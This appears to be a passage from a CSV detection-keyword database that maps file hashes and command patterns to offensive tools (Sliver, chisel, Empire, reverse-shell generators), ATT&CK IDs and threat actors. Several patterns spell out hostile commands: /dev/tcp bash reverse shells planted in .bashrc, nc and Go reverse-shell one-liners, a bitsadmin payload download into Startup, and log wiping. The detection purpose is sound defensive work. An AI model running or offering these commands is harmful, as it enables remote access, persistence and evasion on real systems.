T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42652" "*ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9*",".{0,1000}ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42655" "*eccde00640f1c9f27b63f1a778eee3c50f401f62fbc0e8725a769b8bfe869e70*",".{0,1000}eccde00640f1c9f27b63f1a778eee3c50f401f62fbc0e8725a769b8bfe869e70.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42658" "*ece36280c87bd6fdfd68a6e5daa3381aef5e79d9738db350f4dff8e55cc5090b*",".{0,1000}ece36280c87bd6fdfd68a6e5daa3381aef5e79d9738db350f4dff8e55cc5090b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42660" "*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae","10","10","N/A","N/A","N/A","N/A","42662" "*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","42663" "*ecebdd54145e9987d9ae0f389369e33571bbbad53970f990423902bdb2cc59d2*",".{0,1000}ecebdd54145e9987d9ae0f389369e33571bbbad53970f990423902bdb2cc59d2.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","42666" "*ecec28a01376200b8746d6e2a9873d19b5191cdeb07ae926974b94d775b0c4cf*",".{0,1000}ecec28a01376200b8746d6e2a9873d19b5191cdeb07ae926974b94d775b0c4cf.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42667" "*ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363*",".{0,1000}ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42668" "*ecee4a34d7e86b3445b1ccadefe2e5587808cbd1a1f1408fe63ac3c2aad84d2f*",".{0,1000}ecee4a34d7e86b3445b1ccadefe2e5587808cbd1a1f1408fe63ac3c2aad84d2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42669" "*ecf242b41a845439cc80e76710718b3162be13aee4c7abfa153a5e913c0f4767*",".{0,1000}ecf242b41a845439cc80e76710718b3162be13aee4c7abfa153a5e913c0f4767.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42671" "*ecf31fb8345ea09312964922c549238664485b5593e9e79fb823a3b996c1c5f2*",".{0,1000}ecf31fb8345ea09312964922c549238664485b5593e9e79fb823a3b996c1c5f2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42672" "*ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5*",".{0,1000}ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42673" "*ecf3679f659c5a1393b4a8b7d7cca615c33c21ab525952f8417c2a828697116a*",".{0,1000}ecf3679f659c5a1393b4a8b7d7cca615c33c21ab525952f8417c2a828697116a.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42674" "*ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b*",".{0,1000}ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42677" 
"*ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3*",".{0,1000}ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42678" "*echo ""@RFGroenewoud""*",".{0,1000}echo\s\""\@RFGroenewoud\"".{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","42686" "*echo ""Nothing to see here ... 
"" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42687" "*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#linux","SomalifuscatorV2 used on batch file","10","","N/A","","","","42688" "*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#linux","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","42689" "*echo * > \\.\pipe\*",".{0,1000}echo\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","42693" "*echo */24 | dnsx -silent -resp-only -ptr*",".{0,1000}echo\s.{0,1000}\/24\s\|\sdnsx\s\-silent\s\-resp\-only\s\-ptr.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42697" "*echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet*",".{0,1000}echo\s1\s\>\/proc\/sys\/net\/ipv4\/conf\/all\/route_localnet.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","42710" "*echo 123 > c:\windows\temp\test.txt*",".{0,1000}echo\s123\s\>\sc\:\\windows\\temp\\test\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","42711" "*echo '8.8.8.8' | hakrevdns*",".{0,1000}echo\s\'8\.8\.8\.8\'\s\|\shakrevdns.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42712" "*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd 
Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42714" "*echo bitsadmin /transfer Packages /download /priority foreground %a% ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe*",".{0,1000}echo\sbitsadmin\s\/transfer\sPackages\s\/download\s\/priority\sforeground\s\%a\%\s\""\%USERPROFILE\%\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\Winupdate\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42716" "*echo -e ""getClusterCapabilityData*",".{0,1000}echo\s\-e\s\""getClusterCapabilityData.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","42718" "*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - 
LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42719" "*echo 'import os'*echo*os.system(""nc -e sh*'* > /tmp/*",".{0,1000}echo\s\'import\sos\'.{0,1000}echo.{0,1000}os\.system\(\""nc\s\-e\ssh.{0,1000}\'.{0,1000}\s\>\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42721" "*echo msfvenom -p windows*",".{0,1000}echo\smsfvenom\s\-p\swindows.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","42723" "*echo -n 'cmd /c start rundll32 *.dll* | base64*",".{0,1000}echo\s\-n\s\'cmd\s\/c\sstart\srundll32\s.{0,1000}\.dll.{0,1000}\s\|\sbase64.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","42724" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run 
/tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42726" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42727" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42728" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""cmd"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""cmd\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42729" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""powershell"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""powershell\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42730" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""pwsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run 
/tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""pwsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42731" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42732" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""zsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""zsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42733" "*echo 'PEzor!!*",".{0,1000}echo\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","42734" "*echo powershell -command ""start Winupdate.exe"" 